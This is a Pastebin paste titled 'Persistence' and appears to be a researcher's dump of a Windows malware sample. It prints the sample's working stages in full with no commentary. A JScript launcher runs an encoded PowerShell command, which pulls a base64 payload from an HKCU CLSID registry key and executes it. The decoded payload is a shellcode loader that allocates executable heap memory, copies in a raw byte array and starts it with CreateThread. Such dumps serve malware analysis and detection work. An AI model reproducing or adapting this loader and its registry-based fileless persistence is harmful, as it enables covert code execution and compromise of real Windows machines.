API tools faq
paste
Advertisement
James_inthe_box

Persistence

James_inthe_box
Sep 19th, 2019
2,007
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.78 KB | None | 0 0
raw download clone embed print report
  1. Addressbook.js:
  2.  
  3. WScript.CreateObjeCt('WScript.Shell').Run("C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe -enc JABQAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwARQB4AHAAbABvAHIAZQByAFwAQwBMAFMASQBEAFwAewBBADEANwAzADUAQgAyAEEALQA1AEIAMgBFAC0AQQAxADcAMwAtADIANgA1AEIALQA3ADMAQQAxADIAQQA1AEIANwAzAEEAMQB9ACcAIAAtAG4AIABFADcAMQBEADQAQgA2AEQAMgBCADYAMwA4ADAAMwAxAHwAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAARQA3ADEARAA0AEIANgBEADIAQgA2ADMAOAAwADMAMQA7ACQAUAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAKQApADsAaQBlAHgAKAAkAFAAKQA=",0,false);
  4.  
  5. decoded
  6. $P=Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{A1735B2A-5B2E-A173-265B-73A12A5B73A1}' -n E71D4B6D2B638031|Select-Object -ExpandProperty E71D4B6D2B638031;$P=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($P));iex($P)
  7.  
  8. HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{A1735B2A-5B2E-A173-265B-73A12A5B73A1}:
  9. W0J5dGVbXV0gJHdzd3ZleHk9QCgweEU4LDB4MDAsMHgwMCwweDAwLDB4MDAsMHg1QiwweDgxLDB4RUIsMHgwNSwweDEwLDB4NDAsMHgwMCwweDgxLDB4RUMsMHgxNCwweDAyLDB4MDAsMHgwMCwweDhELDB4MzUsMHhBNCwweDExLDB4NDAsMHgwMCwweDAzLDB4RjMsMHg4QiwweEVDLDB4OEIsMHhGQywweDY0LDB4OEIsMHgxNSwweDMwLDB4MDAsMHgwMCwweDAwLDB4OEIsMHg1MiwweDBDLDB4OEIsMHg1MiwweDFDLDB4OEIsMHg1MiwweDA4LDB4QjksMHgwOCwweDAwLDB4MDAsMHgwMCwweEFELDB4MDMsMHhDMiwweEFCLDB4RTIsMHhGQSwweEI5LDB4MTQsMHgwMiwweDAwLDB4MDAsMHg4MywweEU5LDB4MjAsMHhGMywweEE0LDB4OEQsMHg4NSwweEUwLDB4MDEsMHgwMCwweDAwLDB4OEQsMHg5NSwweERDLDB4MDEsMHgwMCwweDAwLDB4NkEsMHgwNCwweDY4LDB4MDAsMHgzMCwweDAwLDB4MDAsMHg1MiwweDZBLDB4MDAsMHg1MCwweDZBLDB4RkYsMHhGRiwweDc1LDB4MDQsMHg1OCwweEZGLDB4RDAsMHg4NSwweEMwLDB4NzQsMHgwMSwweEMzLDB4OEQsMHg4RCwweEY0LDB4MDEsMHgwMCwweDAwLDB4OEQsMHg0NSwweDIwLDB4ODksMHg0MSwweDA0LDB4OEQsMHg4NSwweEZDLDB4MDEsMHgwMCwweDAwLDB4ODksMHg0OCwweDA4LDB4OEQsMHg5NSwweEU0LDB4MDEsMHgwMCwweDAwLDB4NTAsMHg2QSwweDAxLDB4NTIsMHhGRiwweDc1LDB4MTAsMHg1OCwweEZGLDB4RDAsMHg4NSwweEMwLDB4NzQsMHgwMSwweEMzLDB4OEQsMHg4RCwweEY0LDB4MDEsMHgwMCwweDAwLDB4OEQsMHg4NSwweEI0LDB4MDEsMHgwMCwweDAwLDB4ODksMHg0MSwweDA0LDB4OEIsMHg4NSwweEIwLDB4MDEsMHgwMCwweDAwLDB4NjYsMHg4OSwweDAxLDB4NDAsMHg0MCwweDY2LDB4ODksMHg0MSwweDAyLDB4OEQsMHg4NSwweEY0LDB4MDEsMHgwMCwweDAwLDB4OEQsMHg5NSwweERDLDB4MDEsMHgwMCwweDAwLDB4NTIsMHhGRiwweEI1LDB4REMsMHgwMSwweDAwLDB4MDAsMHhGRiwweEI1LDB4RTAsMHgwMSwweDAwLDB4MDAsMHg2QSwweDAxLDB4NTAsMHhGRiwweEI1LDB4RTQsMHgwMSwweDAwLDB4MDAsMHhGRiwweDc1LDB4MTQsMHg1OCwweEZGLDB4RDAsMHg4NSwweEMwLDB4NzQsMHgwMSwweEMzLDB4RkYsMHhCNSwweEU0LDB4MDEsMHgwMCwweDAwLDB4RkYsMHg3NSwweDA4LDB4NTgsMHhGRiwweEQwLDB4OEIsMHhCNSwweEUwLDB4MDEsMHgwMCwweDAwLDB4MDMsMHg3NiwweDA4LDB4QUQsMHg5MywweEFELDB4MzMsMHhDMywweDg5LDB4ODUsMHhEQywweDAxLDB4MDAsMHgwMCwweDUwLDB4QUQsMHgzMywweEMzLDB4ODksMHg4NSwweEYwLDB4MDEsMHgwMCwweDAwLDB4NTgsMHg4OSwweEI1LDB4RTAsMHgwMSwweDAwLDB4MDAsMHg4QiwweEZFLDB4MzMsMHhEMiwweEI5LDB4MDQsMHgwMCwweDAwLDB4MDAsMHhGNywweEYxLDB4OTEsMHhBRCwweDMzLDB4QzMsMHg0MywweEFCLDB4RTIsMHhGOSwweDg1LDB4RDIsMHg3NCwweDA5LDB4ODcsMHhDQSwweEFDLDB4MzIsMHhDMywweDQzLDB4QUEsMHhFMiwweEY5LDB4OEIsMHg4NSwweERDLDB4MDEsMHgwMCwweDAwLDB4RDEsMHhFMCwweDg5LDB4ODUsMHhFOCwweDAxLDB4MDAsMHgwMCwweDMzLDB4QzAsMHg4OSwweDg1LDB4RUMsMHgwMSwweDAwLDB4MDAsMHg4RCwweDg1LDB4RUMsMHgwMSwweDAwLDB4MDAsMHg4RCwweDk1LDB4RTgsMHgwMSwweDAwLDB4MDAsMHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDUyLDB4NkEsMHgwMCwweDUwLDB4NkEsMHhGRiwweEZGLDB4NzUsMHgwNCwweDU4LDB4RkYsMHhEMCwweDg1LDB4QzAsMHg3NCwweDAxLDB4QzMsMHg4RCwweDg1LDB4RTgsMHgwMSwweDAwLDB4MDAsMHg1MCwweEZGLDB4QjUsMHhEQywweDAxLDB4MDAsMHgwMCwweEZGLDB4QjUsMHhFMCwweDAxLDB4MDAsMHgwMCwweEZGLDB4QjUsMHhFOCwweDAxLDB4MDAsMHgwMCwweEZGLDB4QjUsMHhFQywweDAxLDB4MDAsMHgwMCwweDY4LDB4MDIsMHgwMSwweDAwLDB4MDAsMHhGRiwweDc1LDB4MDAsMHg1OCwweEZGLDB4RDAsMHg4NSwweEMwLDB4NzQsMHgwMSwweEMzLDB4OEIsMHg4NSwweEVDLDB4MDEsMHgwMCwweDAwLDB4MDMsMHg4NSwweEYwLDB4MDEsMHgwMCwweDAwLDB4RkYsMHhEMCwweDUxLDB4RkYsMHgwQiwweDAwLDB4RDAsMHhGQSwweDAxLDB4MDAsMHhGMCwweEY5LDB4MDEsMHgwMCwweDY4LDB4RkIsMHgwMSwweDAwLDB4MzgsMHhGQSwweDAxLDB4MDAsMHhCOCwweEZBLDB4MDEsMHgwMCwweDEyLDB4RTEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg1QywweDAwLDB4NzIsMHgwMCwweDY1LDB4MDAsMHg2NywweDAwLDB4NjksMHgwMCwweDczLDB4MDAsMHg3NCwweDAwLDB4NzIsMHgwMCwweDc5LDB4MDAsMHg1QywweDAwLDB4NzUsMHgwMCwweDczLDB4MDAsMHg2NSwweDAwLDB4NzIsMHgwMCwweDVDLDB4MDAsMHg1MywweDAwLDB4MkQsMHgwMCwweDMxLDB4MDAsMHgyRCwweDAwLDB4MzUsMHgwMCwweDJELDB4MDAsMHgzMiwweDAwLDB4MzEsMHgwMCwweDJELDB4MDAsMHgzMywweDAwLDB4MzgsMHgwMCwweDM5LDB4MDAsMHgzNiwweDAwLDB4MzcsMHgwMCwweDM3LDB4MDAsMHgzNiwweDAwLDB4MzUsMHgwMCwweDM4LDB4MDAsMHgzNCwweDAwLDB4MkQsMHgwMCwweDM0LDB4MDAsMHgzMiwweDAwLDB4MzUsMHgwMCwweDM0LDB4MDAsMHgzOCwweDAwLDB4MzYsMHgwMCwweDM0LDB4MDAsMHgzMCwweDAwLDB4MzAsMHgwMCwweDM5LDB4MDAsMHgyRCwweDAwLDB4MzgsMHgwMCwweDM2LDB4MDAsMHgzMiwweDAwLDB4MzMsMHgwMCwweDM5LDB4MDAsMHgzMSwweDAwLDB4MzYsMHgwMCwweDM4LDB4MDAsMHgzMCwweDAwLDB4MkQsMHgwMCwweDMxLDB4MDAsMHgzMCwweDAwLDB4MzAsMHgwMCwweDMwLDB4MDAsMHg1QywweDAwLDB4NTMsMHgwMCwweDZGLDB4MDAsMHg2NiwweDAwLDB4NzQsMHgwMCwweDc3LDB4MDAsMHg2MSwweDAwLDB4NzIsMHgwMCwweDY1LDB4MDAsMHg1QywweDAwLDB4NEQsMHgwMCwweDY5LDB4MDAsMHg2MywweDAwLDB4NzIsMHgwMCwweDZGLDB4MDAsMHg3MywweDAwLDB4NkYsMHgwMCwweDY2LDB4MDAsMHg3NCwweDAwLDB4NUMsMHgwMCwweDU3LDB4MDAsMHg2OSwweDAwLDB4NkUsMHgwMCwweDY0LDB4MDAsMHg2RiwweDAwLDB4NzcsMHgwMCwweDczLDB4MDAsMHg1QywweDAwLDB4NDMsMHgwMCwweDc1LDB4MDAsMHg3MiwweDAwLDB4NzIsMHgwMCwweDY1LDB4MDAsMHg2RSwweDAwLDB4NzQsMHgwMCwweDU2LDB4MDAsMHg2NSwweDAwLDB4NzIsMHgwMCwweDczLDB4MDAsMHg2OSwweDAwLDB4NkYsMHgwMCwweDZFLDB4MDAsMHg1QywweDAwLDB4NDUsMHgwMCwweDc4LDB4MDAsMHg3MCwweDAwLDB4NkMsMHgwMCwweDZGLDB4MDAsMHg3MiwweDAwLDB4NjUsMHgwMCwweDcyLDB4MDAsMHg1QywweDAwLDB4NDMsMHgwMCwweDRDLDB4MDAsMHg1MywweDAwLDB4NDksMHgwMCwweDQ0LDB4MDAsMHg1QywweDAwLDB4N0IsMHgwMCwweDM4LDB4MDAsMHgzMywweDAwLDB4MzIsMHgwMCwweDM2LDB4MDAsMHgzMSwweDAwLDB4NDYsMHgwMCwweDMxLDB4MDAsMHgzOSwweDAwLDB4MkQsMHgwMCwweDMxLDB4MDAsMHg0NiwweDAwLDB4MzEsMHgwMCwweDQ0LDB4MDAsMHgyRCwweDAwLDB4MzgsMHgwMCwweDMzLDB4MDAsMHgzMiwweDAwLDB4MzYsMHgwMCwweDJELDB4MDAsMHgzMSwweDAwLDB4MzUsMHgwMCwweDMxLDB4MDAsMHg0NiwweDAwLDB4MkQsMHgwMCwweDMyLDB4MDAsMHgzNiwweDAwLDB4MzgsMHgwMCwweDMzLDB4MDAsMHgzMSwweDAwLDB4MzksMHgwMCwweDMxLDB4MDAsMHg0NiwweDAwLDB4MzIsMHgwMCwweDM2LDB4MDAsMHgzOCwweDAwLDB4MzMsMHgwMCwweDdELDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDIwLDB4MDAsMHgwMCwweDAwLDB4NDEsMHgwMCwweDMyLDB4MDAsMHgzNywweDAwLDB4MzQsMHgwMCwweDM1LDB4MDAsMHg0NSwweDAwLDB4MzAsMHgwMCwweDM5LDB4MDAsMHgzMSwweDAwLDB4MzQsMHgwMCwweDQ1LDB4MDAsMHgzMywweDAwLDB4NDYsMHgwMCwweDQ1LDB4MDAsMHgzMywweDAwLDB4MzEsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgyQSwweEUxLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgzOCwweDAxLDB4M0EsMHgwMSwweDAwLDB4MDAsMHgwMCwweDAwLDB4MTgsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4NDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwKTsNCiRubWtvYj05NTI7DQokYmNycXEgPSAnW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBIZWFwQWxsb2MoSW50UHRyIHAsIHVpbnQgaiwgSW50UHRyIGYpOyBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0gcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIENyZWF0ZVRocmVhZChJbnRQdHIgeSwgdWludCBpLCBJbnRQdHIgeCwgdWludCBxLCBJbnRQdHIgbywgSW50UHRyIGQpOyBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0gcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEhlYXBDcmVhdGUodWludCBrLCBJbnRQdHIgcCwgSW50UHRyIGIpOyAnOyRkZGtjcWt1dj1BZGQtVHlwZSAtTmFtZSAiX2Rka2Nxa3V2IiAtbWVtYmVyRGVmaW5pdGlvbiAkYmNycXEgLXBhc3N0aHJ1IC1uYW1lc3BhY2UgV2luMzIgOyRydG55ZXU9JGRka2Nxa3V2OjpIZWFwQ3JlYXRlKCAweDQwMDAwLCAkbm1rb2IsICRubWtvYik7DQokcnRueWV1PSRkZGtjcWt1djo6SGVhcEFsbG9jKCAkcnRueWV1LCA4LCAkbm1rb2IpOw0KW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6Y29weSggJHdzd3ZleHksIDAsICRydG55ZXUsICRubWtvYik7DQokZGRrY3FrdXY6OkNyZWF0ZVRocmVhZCggMCwgMCwgJHJ0bnlldSwgMCwgMCwgMCk7DQpTdGFydC1TbGVlcCAtcyA2Mzg1NQ==
  10.  
  11. decoded:
  12. [Byte[]] $wswvexy=@(0xE8,0x00,0x00,0x00,0x00,0x5B,0x81,0xEB,0x05,0x10,0x40,0x00,0x81,0xEC,0x14,0x02,0x00,0x00,0x8D,0x35,0xA4,0x11,0x40,0x00,0x03,0xF3,0x8B,0xEC,0x8B,0xFC,0x64,0x8B,0x15,0x30,0x00,0x00,0x00,0x8B,0x52,0x0C,0x8B,0x52,0x1C,0x8B,0x52,0x08,0xB9,0x08,0x00,0x00,0x00,0xAD,0x03,0xC2,0xAB,0xE2,0xFA,0xB9,0x14,0x02,0x00,0x00,0x83,0xE9,0x20,0xF3,0xA4,0x8D,0x85,0xE0,0x01,0x00,0x00,0x8D,0x95,0xDC,0x01,0x00,0x00,0x6A,0x04,0x68,0x00,0x30,0x00,0x00,0x52,0x6A,0x00,0x50,0x6A,0xFF,0xFF,0x75,0x04,0x58,0xFF,0xD0,0x85,0xC0,0x74,0x01,0xC3,0x8D,0x8D,0xF4,0x01,0x00,0x00,0x8D,0x45,0x20,0x89,0x41,0x04,0x8D,0x85,0xFC,0x01,0x00,0x00,0x89,0x48,0x08,0x8D,0x95,0xE4,0x01,0x00,0x00,0x50,0x6A,0x01,0x52,0xFF,0x75,0x10,0x58,0xFF,0xD0,0x85,0xC0,0x74,0x01,0xC3,0x8D,0x8D,0xF4,0x01,0x00,0x00,0x8D,0x85,0xB4,0x01,0x00,0x00,0x89,0x41,0x04,0x8B,0x85,0xB0,0x01,0x00,0x00,0x66,0x89,0x01,0x40,0x40,0x66,0x89,0x41,0x02,0x8D,0x85,0xF4,0x01,0x00,0x00,0x8D,0x95,0xDC,0x01,0x00,0x00,0x52,0xFF,0xB5,0xDC,0x01,0x00,0x00,0xFF,0xB5,0xE0,0x01,0x00,0x00,0x6A,0x01,0x50,0xFF,0xB5,0xE4,0x01,0x00,0x00,0xFF,0x75,0x14,0x58,0xFF,0xD0,0x85,0xC0,0x74,0x01,0xC3,0xFF,0xB5,0xE4,0x01,0x00,0x00,0xFF,0x75,0x08,0x58,0xFF,0xD0,0x8B,0xB5,0xE0,0x01,0x00,0x00,0x03,0x76,0x08,0xAD,0x93,0xAD,0x33,0xC3,0x89,0x85,0xDC,0x01,0x00,0x00,0x50,0xAD,0x33,0xC3,0x89,0x85,0xF0,0x01,0x00,0x00,0x58,0x89,0xB5,0xE0,0x01,0x00,0x00,0x8B,0xFE,0x33,0xD2,0xB9,0x04,0x00,0x00,0x00,0xF7,0xF1,0x91,0xAD,0x33,0xC3,0x43,0xAB,0xE2,0xF9,0x85,0xD2,0x74,0x09,0x87,0xCA,0xAC,0x32,0xC3,0x43,0xAA,0xE2,0xF9,0x8B,0x85,0xDC,0x01,0x00,0x00,0xD1,0xE0,0x89,0x85,0xE8,0x01,0x00,0x00,0x33,0xC0,0x89,0x85,0xEC,0x01,0x00,0x00,0x8D,0x85,0xEC,0x01,0x00,0x00,0x8D,0x95,0xE8,0x01,0x00,0x00,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x52,0x6A,0x00,0x50,0x6A,0xFF,0xFF,0x75,0x04,0x58,0xFF,0xD0,0x85,0xC0,0x74,0x01,0xC3,0x8D,0x85,0xE8,0x01,0x00,0x00,0x50,0xFF,0xB5,0xDC,0x01,0x00,0x00,0xFF,0xB5,0xE0,0x01,0x00,0x00,0xFF,0xB5,0xE8,0x01,0x00,0x00,0xFF,0xB5,0xEC,0x01,0x00,0x00,0x68,0x02,0x01,0x00,0x00,0xFF,0x75,0x00,0x58,0xFF,0xD0,0x85,0xC0,0x74,0x01,0xC3,0x8B,0x85,0xEC,0x01,0x00,0x00,0x03,0x85,0xF0,0x01,0x00,0x00,0xFF,0xD0,0x51,0xFF,0x0B,0x00,0xD0,0xFA,0x01,0x00,0xF0,0xF9,0x01,0x00,0x68,0xFB,0x01,0x00,0x38,0xFA,0x01,0x00,0xB8,0xFA,0x01,0x00,0x12,0xE1,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x72,0x00,0x65,0x00,0x67,0x00,0x69,0x00,0x73,0x00,0x74,0x00,0x72,0x00,0x79,0x00,0x5C,0x00,0x75,0x00,0x73,0x00,0x65,0x00,0x72,0x00,0x5C,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x32,0x00,0x31,0x00,0x2D,0x00,0x33,0x00,0x38,0x00,0x39,0x00,0x36,0x00,0x37,0x00,0x37,0x00,0x36,0x00,0x35,0x00,0x38,0x00,0x34,0x00,0x2D,0x00,0x34,0x00,0x32,0x00,0x35,0x00,0x34,0x00,0x38,0x00,0x36,0x00,0x34,0x00,0x30,0x00,0x30,0x00,0x39,0x00,0x2D,0x00,0x38,0x00,0x36,0x00,0x32,0x00,0x33,0x00,0x39,0x00,0x31,0x00,0x36,0x00,0x38,0x00,0x30,0x00,0x2D,0x00,0x31,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x5C,0x00,0x53,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x77,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x5C,0x00,0x4D,0x00,0x69,0x00,0x63,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x5C,0x00,0x43,0x00,0x75,0x00,0x72,0x00,0x72,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x56,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x69,0x00,0x6F,0x00,0x6E,0x00,0x5C,0x00,0x45,0x00,0x78,0x00,0x70,0x00,0x6C,0x00,0x6F,0x00,0x72,0x00,0x65,0x00,0x72,0x00,0x5C,0x00,0x43,0x00,0x4C,0x00,0x53,0x00,0x49,0x00,0x44,0x00,0x5C,0x00,0x7B,0x00,0x38,0x00,0x33,0x00,0x32,0x00,0x36,0x00,0x31,0x00,0x46,0x00,0x31,0x00,0x39,0x00,0x2D,0x00,0x31,0x00,0x46,0x00,0x31,0x00,0x44,0x00,0x2D,0x00,0x38,0x00,0x33,0x00,0x32,0x00,0x36,0x00,0x2D,0x00,0x31,0x00,0x35,0x00,0x31,0x00,0x46,0x00,0x2D,0x00,0x32,0x00,0x36,0x00,0x38,0x00,0x33,0x00,0x31,0x00,0x39,0x00,0x31,0x00,0x46,0x00,0x32,0x00,0x36,0x00,0x38,0x00,0x33,0x00,0x7D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x41,0x00,0x32,0x00,0x37,0x00,0x34,0x00,0x35,0x00,0x45,0x00,0x30,0x00,0x39,0x00,0x31,0x00,0x34,0x00,0x45,0x00,0x33,0x00,0x46,0x00,0x45,0x00,0x33,0x00,0x31,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2A,0xE1,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x01,0x3A,0x01,0x00,0x00,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
  13. $nmkob=952;
  14. $bcrqq = '[DllImport("kernel32.dll")] public static extern IntPtr HeapAlloc(IntPtr p, uint j, IntPtr f); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr y, uint i, IntPtr x, uint q, IntPtr o, IntPtr d); [DllImport("kernel32.dll")] public static extern IntPtr HeapCreate(uint k, IntPtr p, IntPtr b); ';$ddkcqkuv=Add-Type -Name "_ddkcqkuv" -memberDefinition $bcrqq -passthru -namespace Win32 ;$rtnyeu=$ddkcqkuv::HeapCreate( 0x40000, $nmkob, $nmkob);
  15. $rtnyeu=$ddkcqkuv::HeapAlloc( $rtnyeu, 8, $nmkob);
  16. [System.Runtime.InteropServices.Marshal]::copy( $wswvexy, 0, $rtnyeu, $nmkob);
  17. $ddkcqkuv::CreateThread( 0, 0, $rtnyeu, 0, 0, 0);
  18. Start-Sleep -s 63855
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!